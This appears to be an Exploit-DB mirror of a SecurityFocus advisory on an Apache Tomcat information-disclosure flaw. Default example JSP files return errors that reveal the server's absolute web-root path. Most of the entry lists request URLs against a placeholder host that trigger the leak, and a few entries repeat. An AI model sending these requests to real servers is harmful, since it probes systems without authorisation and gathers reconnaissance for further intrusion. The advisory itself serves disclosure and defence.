exploit-db-mirror/exploits/multiple/remote/21491.txt

source: https://www.securityfocus.com/bid/4877/info

Apache Tomcat is a freely available, open source web server maintained by
the Apache Foundation.

When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root. 

The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp